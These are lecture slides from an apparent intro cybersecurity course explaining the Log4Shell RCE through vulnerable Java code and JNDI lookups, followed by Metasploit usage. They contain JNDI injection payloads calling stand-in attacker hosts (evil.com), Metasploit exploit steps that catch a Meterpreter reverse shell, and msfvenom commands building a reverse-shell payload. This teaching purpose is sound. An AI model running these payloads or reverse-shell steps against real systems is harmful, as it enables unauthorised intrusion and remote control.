# General exploitation techniques

## CS 3710: Intro to Cybersecurity

===

## Remote code execution

---

## What's an RCE?

_**Arbitrary code execution (ACE):**_ the ability to run a command or a piece of code of the attacker's choosing on a target machine.

<div class="fragment">

_**Remote code execution (RCE):**_ an ACE that can be triggered over a network, without prior access to the machine.

</div>

<div class="fragment">

From an attacker's point of view, RCE/ACE vulnerabilities are extremely valuable, as they can provide an initial foothold into a victim's network.

</div>

notes:

References:

- [Arbitrary code execution on Wikipedia](https://en.wikipedia.org/wiki/Arbitrary_code_execution)

---

## Example: Log4Shell

<div class="container">
<div class="col">

_**Log4Shell**_ (CVE-2021-44228) is a remote code execution vulnerability affecting Log4j 2, a popular logging library for Java.

<div class="fragment">

It was disclosed in December 2021 and estimated to affect hundreds of millions of devices.

</div>

</div>
<div class="col">
<div class="image-background">
<figure>
<img src="../../img/exploitation/log4shell.webp">
<figcaption>
*Source:* LunaSec
</figcaption>
</figure>
</div>
</div>
</div>

notes:

- [LunaSec writeup](https://www.lunasec.io/docs/blog/log4j-zero-day/)

---

## Example: Log4Shell

<pre>
<code class="java" data-trim data-line-numbers="1-20|13-16" data-fragment-index="0">
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import com.sun.net.httpserver.HttpExchange;
import com.sun.net.httpserver.HttpHandler;
import java.io.*;

public class ExampleHandler implements HttpHandler {

  static Logger log = LogManager.getLogger(ExampleHandler.class.getName());

  public void handle(HttpExchange he) throws IOException {
    String apiVersion = he.getRequestHeaders().getFirst("X-Api-Version");
    // This line triggers the RCE by logging the attacker-controlled
    // HTTP header. The attacker can set their X-Api-Version header
    // to: ${jndi:ldap://some-attacker.com/a}
    log.info("Requested Api Version:{}", apiVersion);
    ...
  }
}
</code>
</pre>

<div class="r-stack">
<div class="fragment fade-out text-center" data-fragment-index="0">

*Source: LunaSec* (adapted)

</div>
<div class="fragment fade-in" data-fragment-index="0">

Log4j formats a log message using attacker-controlled input (in this case, the `X-Api-Version` HTTP header), and vulnerable versions interpret `${...}` lookups found inside that message.

</div>
</div>

notes:

- [LunaSec PoC](https://www.lunasec.io/docs/blog/log4j-zero-day/#example-vulnerable-code)

---

## Example: Log4Shell

Normally, we wouldn't think that anything bad would happen in this code! This is roughly equivalent to the following Python code:

```python
import logging

# Handle HTTP request...
logger = logging.getLogger()
logger.info("Requested Api Version: %s", apiVersion)
# If e.g. apiVersion = "1.1", the log message is "Requested Api Version: 1.1"
```

Python's `logging` substitutes the value for `%s` and stops there; the value itself is never parsed for further directives.

<div class="fragment">

Unfortunately, an attacker can abuse the [Java Naming and Directory Interface (JNDI)](https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE.pdf) to trick Log4j into loading and executing arbitrary code.

</div>

notes:

- Blackhat 2016 talk on JNDI: "A Journey from JNDI/LDAP Manipulation to Remote Code Execution Dream Land" by Alvaro Muñoz (@pwntester) and Oleksandr Mirosh. [Link](https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE.pdf)

---

## Aside: JNDI

<div class="container">
<div class="col">

JNDI is a Java API that lets programs look up data and resources by name, from directory services such as LDAP, DNS or an RMI registry, and receive them as Java objects.

The important point is that JNDI allows a Java program to load and use a Java class file served to it from a remote server, which is exactly what the exploit leverages.

</div>
<div class="col">
<div class="image-background">
<figure>
<img src="../../img/exploitation/jndi-oracle.gif">
<figcaption>
*Source: [Oracle Java Documentation](https://docs.oracle.com/javase/tutorial/jndi/overview/index.html)*
</figcaption>
</figure>
</div>
</div>
</div>

notes:

JNDI = Java Naming and Directory Interface

References:

- [Wikipedia](https://en.wikipedia.org/wiki/Java_Naming_and_Directory_Interface)

---

## Log4j lookups

Log4j 2 supports "lookups": `${prefix:key}` expressions that are expanded when a log event is formatted. Lookups let you attach different bits of context (environment variables, system properties, dates, ...) to logs, which can be very useful when you're debugging a problem.

<figure>
<img src="../../img/exploitation/log4j_lookups.webp">
<figcaption>
</figcaption>
</figure>

One such lookup, `${jndi:...}`, loads data through JNDI. In vulnerable versions, lookups are expanded not only in the logging configuration but inside the logged *message* itself, so attacker-controlled text is expanded too. (Message lookups were disabled by default in Log4j 2.15.0 and removed in 2.16.0.)

notes:

- [Lookups documentation](https://logging.apache.org/log4j/2.x/manual/lookups.html)

---

## Log4Shell exploit steps

<div class="code-inline-bg">
<div class="fragment semi-fade-out" data-fragment-index="0">

Data containing the malicious payload `${jndi:ldap://evil.com/exploit}` reaches the victim's server in some way: an HTTP header, a username, a chat message, anything that ends up being logged.

</div>
<div class="fragment fade-in-then-semi-out" data-fragment-index="0">

The server logs the data/request containing the malicious payload.

</div>
<div class="fragment fade-in-then-semi-out" data-fragment-index="1">

The Log4j vulnerability triggers: the `jndi` lookup makes an LDAP request to the attacker-controlled server `evil.com/exploit`.

</div>
<div class="fragment fade-in-then-semi-out" data-fragment-index="2">

The attacker's LDAP server responds with a reference to a Java class hosted at an attacker-controlled URL; the victim's JVM fetches and instantiates that class, so the attacker's code runs inside the victim's server process.
</div>
</div>

notes:

- Caveat: since Java 8u191 / 11.0.1, `com.sun.jndi.ldap.object.trustURLCodebase` defaults to `false`, which blocks loading a class from a remote codebase over LDAP. Attacks against such JVMs instead rely on other JNDI behaviours (for example deserialising a serialised object returned by the LDAP server, or pointing at gadget classes already on the classpath), so a newer JDK alone is not a fix; patching Log4j is.

---

## Log4Shell demo

notes:

- See LunaSec's writeup for the container image and methodology: https://www.lunasec.io/docs/blog/log4j-zero-day/#reproducing-locally
- Testing with curl (single quotes stop the shell from expanding `${...}` before it is sent):

  `curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://127.0.0.1/a}'`

  If the app is vulnerable, an LDAP listener on 127.0.0.1 port 389 (the default LDAP port, used because the URL gives none) receives a connection as soon as the header is logged.

===

## Metasploit

---

## Intro to Metasploit

<div class="container">
<div class="col">

_**Metasploit**_ is a penetration testing framework for running security assessments. It has a large array of features, including:

- Collecting target data into shared databases
- Running vulnerability scans
- Identifying known vulnerabilities and running exploits for them
- And more!

</div>
<div class="col" style="display: flex; align-items: center;">
<figure>
<img src="../../img/exploitation/metasploit-logo.svg">
<figcaption>
*Source: Rapid7 / Metasploit*
</figcaption>
</figure>
</div>
</div>

notes:

References:

- [Metasploit documentation](https://docs.rapid7.com/metasploit/)

---

## Setting up reverse shells

There are a number of things we might want to do after we obtain remote code execution. One of those things is setting up a _**reverse shell**_: instead of the attacker connecting to a shell listening on the victim, the victim connects back out to a listener the attacker controls.

---

## Setting up reverse shells

<figure>
<img src="../../img/exploitation/normal_shell.webp">
<figcaption>
Normal (bind) shell: the victim listens, the attacker connects in.
</figcaption>
</figure>

---

## Setting up reverse shells

<figure>
<img src="../../img/exploitation/reverse_shell.webp">
<figcaption>
Reverse shell: the attacker listens, the victim connects back.
</figcaption>
</figure>

notes:

Various reasons we might want to use a reverse shell:

- A little stealthier -- we don't have to open up a new listening port on the remote machine. In some cases you can obtain a reverse shell without having to start a new process.
- It's not always possible for us to connect to a different port on the exploited machine, e.g. if it sits behind NAT (Network Address Translation) or a firewall and isn't directly reachable, whereas outbound connections from it are usually allowed.
---

## Using Metasploit against Log4Shell

See what modules are available to run against hosts that are vulnerable to Log4Shell:

```text
msf6 > search log4shell
```

<figure>
<img src="../../img/exploitation/msf_module_search.webp">
<figcaption>
</figcaption>
</figure>

---

## Using Metasploit against Log4Shell

Load a module and see the options that are available for it.

```text
msf6 > use auxiliary/scanner/http/log4shell_scanner
msf6 auxiliary(scanner/http/log4shell_scanner) > options
```

You can also run `info` to learn more about the module's functionality.

<figure>
<img src="../../img/exploitation/msf_module_options.webp">
<figcaption>
</figcaption>
</figure>

---

## Using Metasploit against Log4Shell

Set options and run the module:

<pre>
<code class="text" data-trim data-line-numbers="1-13|1-2|4-5|7-12" data-fragment-index="0">
msf6 auxiliary(scanner/http/log4shell_scanner) > set RHOSTS terminal.example.com
RHOSTS => terminal.example.com

msf6 auxiliary(scanner/http/log4shell_scanner) > set RPORT 8080
RPORT => 8080

msf6 auxiliary(scanner/http/log4shell_scanner) > set SRVHOST desktop.example.com
SRVHOST => desktop.example.com
msf6 auxiliary(scanner/http/log4shell_scanner) > set SRVPORT 33889
SRVPORT => 33889

msf6 auxiliary(scanner/http/log4shell_scanner) > exploit
</code>
</pre>

<div class="r-stack text-center">
<div class="fragment fade-in-then-out" data-fragment-index="0">

`RHOSTS`: the host(s) that you're attacking

</div>
<div class="fragment fade-in-then-out" data-fragment-index="1">

`RPORT`: the port that the potentially vulnerable service is listening on.

</div>
<div class="fragment fade-in" data-fragment-index="2">

`SRVHOST`, `SRVPORT`: the interface/port on the attacker's machine where the module runs its own LDAP server. A target is reported as vulnerable when it connects back to that server after logging the injected header.

</div>
</div>

---

## Using Metasploit against Log4Shell

Exploit the vulnerability and catch a reverse shell:

<pre>
<code class="text" data-trim data-line-numbers="1-12|1|3-4|6-10" data-fragment-index="0">
msf6 > use exploit/multi/http/log4shell_header_injection

msf6 exploit(...) > set PAYLOAD java/meterpreter/reverse_http
PAYLOAD => java/meterpreter/reverse_http

msf6 exploit(...) > set LHOST desktop.example.com
LHOST => desktop.example.com
msf6 exploit(...) > set LPORT 33445
LPORT => 33445

msf6 exploit(...) > run
</code>
</pre>

<div class="r-stack text-center">
<div class="fragment fade-in-then-out" data-fragment-index="0">

`exploit/multi/http/log4shell_header_injection` is an exploit against systems vulnerable to Log4Shell: it injects the `${jndi:...}` payload into HTTP headers and serves the malicious LDAP response itself, so `RHOSTS`, `RPORT`, `SRVHOST` and `SRVPORT` are set as on the previous slide.

</div>
<div class="fragment fade-in-then-out" data-fragment-index="1">

We use the `java/meterpreter/reverse_http` payload, which runs inside the exploited JVM and gives us a Meterpreter reverse shell.

</div>
<div class="fragment fade-in-then-out" data-fragment-index="2">

`LHOST` and `LPORT`: the address/port on the attacker's machine that the payload connects back to; Metasploit starts the matching handler there when you `run`.

</div>
</div>

---

## Other Metasploit tools: `msfvenom`

<div class="fragment semi-fade-out" data-fragment-index="0">

`msfvenom` is a tool for generating and encoding payloads. You can use this with Metasploit or with another tool to exploit a vulnerability.

</div>
<div class="fragment fade-in-then-semi-out" data-fragment-index="0">

Generate payload:

```bash
$ msfvenom --arch x64 \
    --platform linux \
    --payload linux/x64/meterpreter_reverse_http \
    --format elf \
    LHOST=desktop.example.com LPORT=1234 > payload.bin
```

</div>
<div class="fragment" data-fragment-index="1">

Run handler (the payload, `LHOST` and `LPORT` must match what `msfvenom` was given, otherwise the connection back is not understood):

```text
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set PAYLOAD linux/x64/meterpreter_reverse_http
PAYLOAD => linux/x64/meterpreter_reverse_http
msf6 exploit(multi/handler) > set LHOST desktop.example.com
LHOST => desktop.example.com
msf6 exploit(multi/handler) > set LPORT 1234
LPORT => 1234
msf6 exploit(multi/handler) > run
```

</div>

notes:

- [Msfvenom from Offensive Security](https://www.offensive-security.com/metasploit-unleashed/Msfvenom/)
- [Shikata Ga Nai encoder -- blogpost by Mandiant](https://www.mandiant.com/resources/blog/shikata-ga-nai-encoder-still-going-strong)